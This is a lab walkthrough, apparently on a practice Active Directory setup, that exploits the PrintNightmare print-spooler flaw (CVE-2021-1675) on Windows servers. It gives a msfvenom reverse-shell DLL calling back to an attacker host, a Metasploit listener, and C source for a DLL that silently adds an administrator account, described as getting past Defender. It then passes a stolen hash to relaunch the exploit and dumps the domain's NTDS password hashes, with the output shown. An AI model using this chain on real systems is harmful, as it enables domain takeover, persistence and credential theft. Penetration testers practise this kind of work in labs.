Exploit

Exploit on vulnerable windows server 2019 (Bronx)

• Now try the same exploit on a vulnerable windows server 2019

python3 CVE-2021-1675.py north.newyork.local/elena.lopez:'princesa1'@north.newyork.local '\\192.168.56.31\ATTACKERSHARE\nightmare.dll'

To exploit printnightmare we will first check if the spooler is active on targets

Check spooler is active

crackmapexec smb 192.168.56.10-23 -M spooler

rpcdump.py @192.168.56.10 | egrep 'MS-RPRN|MS-PAR'

sudo smbserver.py -smb2support "smb" /home/jefe/smb

Create Revershell and place it in the smb directory

msfvenom -f dll -p windows/x64/shell_reverse_tcp LHOST=192.168.56.31 LPORT=4444 -o /home/jefe/smb/remote.dll

Setup the listener

msfconsole
use multi/handler
set payload windows/x64/shell_reverse_tcp
set lhost 192.168.56.31
set lport 4444
run

python3 CVE-2021-1675.py maryland.local/teresa.perez@baltimore.maryland.local -hashes 00000000000000000000000000000000:4d737ec9ecf0b9955a161773cfed9611 '\\192.168.56.31\smb\pnightmare2.dll'

No shell.. It gets caught by defender

Lets craft a new dll

• Let’s change the payload with another code (source : https://github.com/newsoft/adduser

• Good (thing) to know : after some failures the spooler service will be stopped by defender and no more exploit for you until someone restart the server or the spooler service.

/*
 * ADDUSER.C: creating a Windows user programmatically.
 */

#define UNICODE
#define _UNICODE

#include <windows.h>
#include <string.h>
#include <lmaccess.h>
#include <lmerr.h>
#include <tchar.h>


DWORD CreateAdminUserInternal(void)
{
    NET_API_STATUS rc;
    BOOL b;
    DWORD dw;

    USER_INFO_1 ud;
    LOCALGROUP_MEMBERS_INFO_0 gd;
    SID_NAME_USE snu;

    DWORD cbSid = 256;    // 256 bytes should be enough for everybody :)
    BYTE Sid[256];

    DWORD cbDomain = 256 / sizeof(TCHAR);
    TCHAR Domain[256];

    // Create user
    memset(&ud, 0, sizeof(ud));

    ud.usri1_name        = _T("yournightmare");                // username
    ud.usri1_password    = _T("Jusbrowsing123!");             // password
    ud.usri1_priv        = USER_PRIV_USER;                   // cannot set USER_PRIV_ADMIN on creation
    ud.usri1_flags       = UF_SCRIPT | UF_NORMAL_ACCOUNT;    // must be set
    ud.usri1_script_path = NULL;

    rc = NetUserAdd(
        NULL,            // local server
        1,                // information level
        (LPBYTE)&ud,
        NULL            // error value
    );

    if (rc != NERR_Success) {
        _tprintf(_T("NetUserAdd FAIL %d 0x%08x\r\n"), rc, rc);
        return rc;
    }

   _tprintf(_T("NetUserAdd OK\r\n"), rc, rc);

    // Get user SID
    b = LookupAccountName(
        NULL,            // local server
        ud.usri1_name,   // account name
        Sid,             // SID
        &cbSid,          // SID size
        Domain,          // Domain
        &cbDomain,       // Domain size
        &snu             // SID_NAME_USE (enum)
    );

    if (!b) {
        dw = GetLastError();
        _tprintf(_T("LookupAccountName FAIL %d 0x%08x\r\n"), dw, dw);
        return dw;
    }

    // Add user to "Administrators" local group
    memset(&gd, 0, sizeof(gd));

    gd.lgrmi0_sid = (PSID)Sid;

    rc = NetLocalGroupAddMembers(
        NULL,                    // local server
        _T("Administrators"),
        0,                        // information level
        (LPBYTE)&gd,
        1                        // only one entry
    );

    if (rc != NERR_Success) {
        _tprintf(_T("NetLocalGroupAddMembers FAIL %d 0x%08x\r\n"), rc, rc);
        return rc;
    }

    return 0;
}

//
// DLL entry point.
//

BOOL APIENTRY DllMain(HMODULE hModule, DWORD  ul_reason_for_call, LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        CreateAdminUserInternal();
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

// RUNDLL32 entry point
#ifdef __cplusplus
extern "C" {
#endif

__declspec(dllexport) void __stdcall CreateAdminUser(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow)
{
    CreateAdminUserInternal();
}

#ifdef __cplusplus
}
#endif

// Command-line entry point.
int main()
{
    return CreateAdminUserInternal();
}

• with this payload we can bypass defender and add our user as administrator

Compile

sudo apt-get install gcc-mingw-w64
wget https://raw.githubusercontent.com/newsoft/adduser/master/adduser.c

x86_64-w64-mingw32-gcc -shared -opnightmare2.dll adduser.c -lnetapi32

• relaunch the exploit

python3 CVE-2021-1675.py maryland.local/teresa.perez@baltimore.maryland.local -hashes 00000000000000000000000000000000:4d737ec9ecf0b9955a161773cfed9611 '\\192.168.56.31\smb\yournightmare.dll'

dumpy dumpy dumpy love love

crackmapexec smb baltimore.maryland.local -u yournightmare -p 'Jusbrowsing123!' --ntds
crackmapexec smb baltimore.maryland.local -u yournightmare -p 'Jusbrowsing123!' --ntds
SMB         maryland.local  445    BALTIMORE        [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:BALTIMORE) (domain:maryland.local) (signing:True) (SMBv1:True)
SMB         maryland.local  445    BALTIMORE        [+] maryland.local\yournightmare:Jusbrowsing123! (Pwn3d!)
SMB         maryland.local  445    BALTIMORE        [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         maryland.local  445    BALTIMORE        Administrator:500:aad3b435b51404eeaad3b435b51404ee:54296a48cd30259cc88095373cec24da:::
SMB         maryland.local  445    BALTIMORE        Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         maryland.local  445    BALTIMORE        krbtgt:502:aad3b435b51404eeaad3b435b51404ee:10f39f5a270977c56ac002b2c9cd660f:::
SMB         maryland.local  445    BALTIMORE        DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         maryland.local  445    BALTIMORE        vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
SMB         maryland.local  445    BALTIMORE        carmelo.Anthony:1110:aad3b435b51404eeaad3b435b51404ee:e205909d5d55a6d75365f15defbf27fb:::
SMB         maryland.local  445    BALTIMORE        marisol.Pedrosa:1111:aad3b435b51404eeaad3b435b51404ee:fd208d19680104ddb8e3d90962c0334e:::
SMB         maryland.local  445    BALTIMORE        joaquin.Pereida:1112:aad3b435b51404eeaad3b435b51404ee:739120ebc4dd940310bc4bb5c9d37021:::
SMB         maryland.local  445    BALTIMORE        teresa.Perez:1113:aad3b435b51404eeaad3b435b51404ee:4d737ec9ecf0b9955a161773cfed9611:::
SMB         maryland.local  445    BALTIMORE        sql_svc:1114:aad3b435b51404eeaad3b435b51404ee:84a5092f53390ea48d660be52b93b804:::
SMB         maryland.local  445    BALTIMORE        pnightmare2:1115:aad3b435b51404eeaad3b435b51404ee:c103cafa49983dbcf3d8a1c951f46347:::
SMB         maryland.local  445    BALTIMORE        yournightmare:1116:aad3b435b51404eeaad3b435b51404ee:7b82840d460325f21d39ffdb471536f9:::
SMB         maryland.local  445    BALTIMORE        BALTIMORE$:1001:aad3b435b51404eeaad3b435b51404ee:0067621d2cb3ac05314b36ee408c7e51:::
SMB         maryland.local  445    BALTIMORE        SALISBURY$:1104:aad3b435b51404eeaad3b435b51404ee:da0edcfd9de34981b3bad4979882ec22:::
SMB         maryland.local  445    BALTIMORE        newyork$:1105:aad3b435b51404eeaad3b435b51404ee:3efc88864c2ab5cb43747ae949685db2:::
SMB         maryland.local  445    BALTIMORE        [+] Dumped 15 NTDS hashes to /home/jefe/.cme/logs/BALTIMORE_maryland.local_2023-03-08_223947.ntds of which 12 were added to the database

cleanup

xfreerdp /u:yournightmare /p:Jusbrowsing123! /v:192.168.56.12 /size:80%  /cert-ignore

• After the exploitation you will find your dlls inside : C:\Windows\System32\spool\drivers\x64\3

• And also inside : C:\Windows\System32\spool\drivers\x64\3\Old\{id}\

• Don’t forget to clean up ;)